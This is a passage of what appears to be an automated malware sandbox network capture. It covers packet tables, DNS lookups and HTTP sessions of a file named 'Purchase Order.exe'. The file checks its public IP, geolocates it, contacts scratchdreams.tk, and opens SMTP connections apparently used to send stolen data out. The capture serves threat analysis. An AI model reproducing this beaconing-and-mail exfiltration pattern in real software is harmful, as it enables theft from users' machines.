Apr 4, 2024 10:28:00.764769077 CEST	49718	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:00.764883995 CEST	49718	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:00.995322943 CEST	80	49718	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:01.057905912 CEST	80	49718	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:01.059323072 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:01.059364080 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:01.059448004 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:01.059669018 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:01.059683084 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:01.109503984 CEST	49718	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:01.317008972 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:01.330501080 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:01.330521107 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:01.613706112 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:01.613814116 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:01.613861084 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:01.614764929 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:01.617921114 CEST	49718	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:01.619021893 CEST	49720	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:01.848156929 CEST	80	49718	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:01.848246098 CEST	49718	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:01.851039886 CEST	80	49720	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:01.851205111 CEST	49720	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:01.851242065 CEST	49720	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:02.083311081 CEST	80	49720	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:02.083789110 CEST	80	49720	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:02.084897995 CEST	49721	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:02.084938049 CEST	443	49721	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:02.085009098 CEST	49721	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:02.085243940 CEST	49721	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:02.085257053 CEST	443	49721	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:02.125207901 CEST	49720	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:02.342479944 CEST	443	49721	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:02.343921900 CEST	49721	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:02.343945026 CEST	443	49721	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:02.640252113 CEST	443	49721	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:02.640443087 CEST	443	49721	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:02.640492916 CEST	49721	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:02.641068935 CEST	49721	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:02.646155119 CEST	49720	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:02.647387028 CEST	49722	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:02.877975941 CEST	80	49722	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:02.878139019 CEST	80	49720	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:02.878165007 CEST	49722	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:02.878200054 CEST	49720	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:02.878231049 CEST	49722	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:03.108962059 CEST	80	49722	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:03.110166073 CEST	80	49722	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:03.111614943 CEST	49723	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:03.111646891 CEST	443	49723	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:03.111721039 CEST	49723	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:03.112042904 CEST	49723	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:03.112054110 CEST	443	49723	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:03.156294107 CEST	49722	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:03.367238045 CEST	443	49723	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:03.413089037 CEST	49723	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:03.413105965 CEST	443	49723	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:03.664804935 CEST	443	49723	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:03.665026903 CEST	443	49723	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:03.665081024 CEST	49723	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:03.666130066 CEST	49723	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:03.684051037 CEST	49722	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:03.914802074 CEST	80	49722	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:03.915043116 CEST	49722	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:04.065965891 CEST	49724	443	192.168.2.5	172.67.169.18
Apr 4, 2024 10:28:04.065985918 CEST	443	49724	172.67.169.18	192.168.2.5
Apr 4, 2024 10:28:04.066060066 CEST	49724	443	192.168.2.5	172.67.169.18
Apr 4, 2024 10:28:04.066704988 CEST	49724	443	192.168.2.5	172.67.169.18
Apr 4, 2024 10:28:04.066715956 CEST	443	49724	172.67.169.18	192.168.2.5
Apr 4, 2024 10:28:04.328640938 CEST	443	49724	172.67.169.18	192.168.2.5
Apr 4, 2024 10:28:04.328876019 CEST	49724	443	192.168.2.5	172.67.169.18
Apr 4, 2024 10:28:04.330630064 CEST	49724	443	192.168.2.5	172.67.169.18
Apr 4, 2024 10:28:04.330636024 CEST	443	49724	172.67.169.18	192.168.2.5
Apr 4, 2024 10:28:04.330851078 CEST	443	49724	172.67.169.18	192.168.2.5
Apr 4, 2024 10:28:04.332184076 CEST	49724	443	192.168.2.5	172.67.169.18
Apr 4, 2024 10:28:04.376228094 CEST	443	49724	172.67.169.18	192.168.2.5
Apr 4, 2024 10:28:35.825572014 CEST	443	49724	172.67.169.18	192.168.2.5
Apr 4, 2024 10:28:35.825628996 CEST	443	49724	172.67.169.18	192.168.2.5
Apr 4, 2024 10:28:35.825683117 CEST	49724	443	192.168.2.5	172.67.169.18
Apr 4, 2024 10:28:35.830303907 CEST	49724	443	192.168.2.5	172.67.169.18
Apr 4, 2024 10:28:41.199204922 CEST	49733	587	192.168.2.5	208.91.198.143
Apr 4, 2024 10:28:41.394470930 CEST	587	49733	208.91.198.143	192.168.2.5
Apr 4, 2024 10:28:41.394630909 CEST	49733	587	192.168.2.5	208.91.198.143
Apr 4, 2024 10:28:41.735502958 CEST	587	49733	208.91.198.143	192.168.2.5
Apr 4, 2024 10:28:41.735698938 CEST	49733	587	192.168.2.5	208.91.198.143
Apr 4, 2024 10:28:41.932097912 CEST	587	49733	208.91.198.143	192.168.2.5
Apr 4, 2024 10:28:41.932111979 CEST	587	49733	208.91.198.143	192.168.2.5
Apr 4, 2024 10:28:41.933192015 CEST	49733	587	192.168.2.5	208.91.198.143
Apr 4, 2024 10:28:42.131150007 CEST	587	49733	208.91.198.143	192.168.2.5
Apr 4, 2024 10:28:42.131409883 CEST	49733	587	192.168.2.5	208.91.198.143
Apr 4, 2024 10:28:42.333214045 CEST	587	49733	208.91.198.143	192.168.2.5
Apr 4, 2024 10:28:42.333444118 CEST	49733	587	192.168.2.5	208.91.198.143
Apr 4, 2024 10:28:42.530410051 CEST	587	49733	208.91.198.143	192.168.2.5
Apr 4, 2024 10:28:42.530620098 CEST	49733	587	192.168.2.5	208.91.198.143
Apr 4, 2024 10:28:42.746668100 CEST	587	49733	208.91.198.143	192.168.2.5
Apr 4, 2024 10:28:42.749476910 CEST	49733	587	192.168.2.5	208.91.198.143
Apr 4, 2024 10:28:42.945805073 CEST	587	49733	208.91.198.143	192.168.2.5
Apr 4, 2024 10:28:42.945875883 CEST	49733	587	192.168.2.5	208.91.198.143
Apr 4, 2024 10:29:02.929195881 CEST	80	49712	132.226.247.73	192.168.2.5
Apr 4, 2024 10:29:02.929368973 CEST	49712	80	192.168.2.5	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2024 10:27:55.070929050 CEST	61382	53	192.168.2.5	1.1.1.1
Apr 4, 2024 10:27:55.195292950 CEST	53	61382	1.1.1.1	192.168.2.5
Apr 4, 2024 10:27:55.959363937 CEST	61362	53	192.168.2.5	1.1.1.1
Apr 4, 2024 10:27:56.084506989 CEST	53	61362	1.1.1.1	192.168.2.5
Apr 4, 2024 10:28:03.683947086 CEST	50387	53	192.168.2.5	1.1.1.1
Apr 4, 2024 10:28:04.065042973 CEST	53	50387	1.1.1.1	192.168.2.5
Apr 4, 2024 10:28:41.071504116 CEST	55532	53	192.168.2.5	1.1.1.1
Apr 4, 2024 10:28:41.198482990 CEST	53	55532	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 4, 2024 10:27:55.070929050 CEST	192.168.2.5	1.1.1.1	0xb125	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:27:55.959363937 CEST	192.168.2.5	1.1.1.1	0x8abc	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:28:03.683947086 CEST	192.168.2.5	1.1.1.1	0x5d4	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:28:41.071504116 CEST	192.168.2.5	1.1.1.1	0xb066	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 4, 2024 10:27:55.195292950 CEST	1.1.1.1	192.168.2.5	0xb125	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2024 10:27:55.195292950 CEST	1.1.1.1	192.168.2.5	0xb125	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:27:55.195292950 CEST	1.1.1.1	192.168.2.5	0xb125	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:27:55.195292950 CEST	1.1.1.1	192.168.2.5	0xb125	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:27:55.195292950 CEST	1.1.1.1	192.168.2.5	0xb125	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:27:55.195292950 CEST	1.1.1.1	192.168.2.5	0xb125	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:27:56.084506989 CEST	1.1.1.1	192.168.2.5	0x8abc	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:27:56.084506989 CEST	1.1.1.1	192.168.2.5	0x8abc	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:28:04.065042973 CEST	1.1.1.1	192.168.2.5	0x5d4	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:28:04.065042973 CEST	1.1.1.1	192.168.2.5	0x5d4	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:28:41.198482990 CEST	1.1.1.1	192.168.2.5	0xb066	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:28:41.198482990 CEST	1.1.1.1	192.168.2.5	0xb066	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:28:41.198482990 CEST	1.1.1.1	192.168.2.5	0xb066	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Apr 4, 2024 10:28:41.198482990 CEST	1.1.1.1	192.168.2.5	0xb066	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

scratchdreams.tk

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	132.226.247.73	80	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 10:27:55.442771912 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 10:27:55.679744959 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:27:55 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a8d8a25a90b944cd1eacf99a243a6fd4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 4, 2024 10:27:55.684537888 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 4, 2024 10:27:55.920300961 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:27:55 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 029e45e120d41971ec3403e46bd3e972 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 4, 2024 10:27:56.657218933 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 4, 2024 10:27:56.892607927 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:27:56 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 979b3ddaf0e34c0317d8d37bf5edee30 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	132.226.247.73	80	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 10:27:57.696743965 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 4, 2024 10:27:57.929542065 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:27:57 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d7ba73d36e5c9fbdfdfc35d3fab4b00f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	132.226.247.73	80	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 10:27:58.721911907 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 10:27:58.952750921 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:27:58 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f1afde81224670f41b15b771dd5c8132 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	132.226.247.73	80	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 10:27:59.742269039 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 10:27:59.972361088 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:27:59 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8f673b48751b8d9948e9a844dcc0b9b4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49718	132.226.247.73	80	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 10:28:00.764883995 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 10:28:01.057905912 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:28:00 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3633875e42150ff4391b74770046949f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49720	132.226.247.73	80	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 10:28:01.851242065 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 10:28:02.083789110 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:28:01 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 48d734182622e4b2b33c41a7851c2af7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	132.226.247.73	80	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 10:28:02.878231049 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 10:28:03.110166073 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:28:02 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0317de2997528c5e3c2ae3cca99de9e1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	104.21.67.152	443	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 08:27:56 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-04 08:27:56 UTC	720	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:27:56 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 69857 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F%2FvHvAJQIYn%2BMt2NVna4k%2FY6PJE%2BT9hn5W9waF%2BAZEbLLnRL8vEccrF%2FiL8MHF36TQHH23MwhJlC5tSqPsw%2FhiP%2FocU%2Fo%2B46UfFYwTEJQW0FZN2KdFWIWGYfd2NSXODgI2h0sEDv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86efec0e98f9b3d4-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 08:27:56 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 08:27:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	104.21.67.152	443	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 08:27:57 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-04 08:27:57 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:27:57 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 69858 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NtJGRVcFbB2h46eKfCG0iFUd5cw4Dfct8SfRutJp23wA3Vh0CQ4ypWW049ynz4VlBYdppFhp1m%2FE6pwRlOjKTa7pjT2u0b3%2BnGQREnQNLcqARp%2F0nVC2FbJqLhWXq%2FP07hjOfY3n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86efec139819b3b9-MIA alt-svc: h3=":443"; ma=86400
